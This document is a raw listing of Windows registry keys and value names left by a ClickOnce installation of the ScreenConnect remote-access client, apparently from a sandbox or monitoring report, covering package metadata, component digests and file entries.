HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!01000000f1c0ae06201800008c1900000000000000000000b05e29287b15db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
OnlineAppQuotaUsageEstimate
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
lock!10000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
lock!0e000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
lock!0c000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
lock!0a000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
lock!08000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!06000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
lock!04000000b55dec06201800008c19000000000000000000006af6eb8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
PreparedForExecution
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
lock!11000000c45dec06201800008c1900000000000000000000be45ee8e8415db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
